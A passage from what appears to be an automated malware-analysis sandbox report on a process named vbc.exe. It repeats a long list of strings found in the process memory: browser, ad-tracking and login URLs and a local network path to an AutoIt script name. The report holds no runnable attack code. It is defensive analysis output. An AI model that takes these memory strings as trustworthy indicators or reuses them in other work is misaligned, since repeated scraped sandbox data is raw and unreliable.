pr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000002.00000003.259179017.0000000002418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.280821648.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.280821648.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.299884129.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.299884129.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.300264453.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300134040.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.300264453.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300134040.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000009.00000003.297406475.0000000000A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.med